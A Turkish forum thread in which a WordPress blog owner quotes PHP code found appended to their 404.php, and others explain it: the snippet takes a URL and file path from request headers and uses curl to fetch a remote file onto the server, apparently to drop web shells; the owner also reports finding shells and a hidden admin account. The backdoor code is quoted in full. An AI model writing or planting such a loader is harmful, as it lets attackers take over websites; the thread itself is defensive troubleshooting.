Şimdi Ara

Wordpress 404.php de bu kodu buldum Hacklendim galiba

Daha Fazla
Bu Konudaki Kullanıcılar: Daha Az
2 Misafir - 2 Masaüstü
5 sn
5
Cevap
0
Favori
699
Tıklama
Daha Fazla
İstatistik
  • Konu İstatistikleri Yükleniyor
0 oy
Öne Çıkar
Sayfa: 1
Giriş
Mesaj
  • Merhaba,

    wordpress blogumun 404.php sinin en altında

    quote:

    <?php

    $ur = $_SERVER['HTTP_ACCEPT'];

    $f = $_SERVER['HTTP_ACCEPT_LANGUAGE'];

    if (preg_match('/http/i', $ur)) {

    $ch = curl_init($ur);

    $fp = fopen($f, "w");

    curl_setopt($ch, CURLOPT_FILE, $fp);

    curl_setopt($ch, CURLOPT_HEADER, 0);

    curl_exec($ch); curl_close($ch);fclose($fp);

    }

    ?>


    bu konu buldum. Nedir bu acaba ? Ne işlev yapar ?



  • HTTP_ACCEPT içerinde http ile başlayan bir şey varsa onu alıp dizine kaydediyor. Büyük ihtimalle shell yüklemek içindir.
  • üstad dizinde 2 tane shell dosyası buldum ve mysql user table da admin yetkileri verilmiş kullanıcı buldum (panelde gözükmüyordu). bunları temizledim. acaba bu http_accept dedigin şey nedir. Bu dizine yollanan dosyalar nerden geliyor serverda biryerde gizlimidir ?
  • $fp = fopen($f, "w"); bunla bir dosyası sana yazdırıyor içinde de başka çekmek istediği dosyalar vardır büyük ihtimal ya da direkt shell atıp onun üzerinden ilerleyebilir.
    daha sonra CURL ile de yüklemek istediği dosya işlemine başlıyor.

    CURL genelde dosya indirme işlemlerinde ya da bir sayfayı çağırma işlemlerinde kullanılır.
  • curl_init yaptığı url önemli aslında ona baksana $ur variablesine
  • Yapay Zeka’dan İlgili Konular
    Daha Fazla Göster
    
Sayfa: 1
- x
Bildirim
mesajınız kopyalandı (ctrl+v) yapıştırmak istediğiniz yere yapıştırabilirsiniz.